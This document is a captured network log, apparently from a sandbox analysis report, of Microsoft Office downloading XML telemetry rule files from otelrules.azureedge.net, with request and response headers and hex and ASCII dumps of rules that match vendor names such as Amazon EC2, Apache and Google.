                                                                        2024-12-03 16:50:42 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        60192.168.2.44981813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:44 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:44 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:44 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 425
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                        ETag: "0x8DC582BBA25094F"
                                                                        x-ms-request-id: be2d73de-001e-002b-2f62-4399f2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165044Z-174f7845968swgbqhC1EWRmnb4000000168g00000000spk4
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:44 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        61192.168.2.44981913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:44 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:44 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:44 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 475
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                        x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165044Z-174f7845968cpnpfhC1EWR3afc00000015vg00000000acb7
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:44 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        62192.168.2.44982113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:44 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:44 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:44 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 491
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                        ETag: "0x8DC582B98B88612"
                                                                        x-ms-request-id: 21da0aac-a01e-0021-7d18-43814c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165044Z-174f7845968nxc96hC1EWRspw800000015ug00000000ugzd
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:44 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        63192.168.2.44982013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:44 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:44 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:44 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 448
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                        ETag: "0x8DC582BB389F49B"
                                                                        x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165044Z-174f7845968xr5c2hC1EWRd0hn0000000r50000000001ntd
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:44 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        64192.168.2.44982213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:44 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:45 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:44 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 416
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                        ETag: "0x8DC582BAEA4B445"
                                                                        x-ms-request-id: 212a65f3-801e-0047-41e7-447265000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165044Z-174f7845968cs2nkhC1EWR2tq000000001t000000000uqa9
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        65192.168.2.44982313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:46 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:46 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:46 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 479
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                        ETag: "0x8DC582B989EE75B"
                                                                        x-ms-request-id: 0fbdb1d5-101e-0079-0270-435913000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165046Z-174f7845968px8v7hC1EWR08ng00000016g0000000008sqc
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:46 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        66192.168.2.44982413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:46 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:46 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:46 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 415
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                        ETag: "0x8DC582BA80D96A1"
                                                                        x-ms-request-id: 9d60b28b-101e-0017-33c7-4347c7000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165046Z-174f7845968j6t2phC1EWRcfe800000016dg0000000069p2
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:46 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        67192.168.2.44982513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:46 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:46 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:46 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 471
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                        x-ms-request-id: 4c860516-801e-00a3-3252-437cfb000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165046Z-174f7845968vqt9xhC1EWRgten00000016a0000000006383
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:46 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        68192.168.2.44982613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:46 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:46 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:46 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 419
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                        ETag: "0x8DC582B9C710B28"
                                                                        x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165046Z-174f7845968xr5c2hC1EWRd0hn0000000qzg00000000ps8e
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        69192.168.2.44982713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:46 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:47 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:47 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 477
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                        ETag: "0x8DC582BA54DCC28"
                                                                        x-ms-request-id: 3f63c6b9-401e-0064-499d-4354af000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165047Z-174f78459685m244hC1EWRgp2c00000015yg00000000s6hp
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:47 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        70192.168.2.44982913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:48 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:49 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:48 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 477
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                        x-ms-request-id: 8bbb4784-e01e-0003-6915-410fa8000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165048Z-174f7845968px8v7hC1EWR08ng00000016hg00000000350m
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
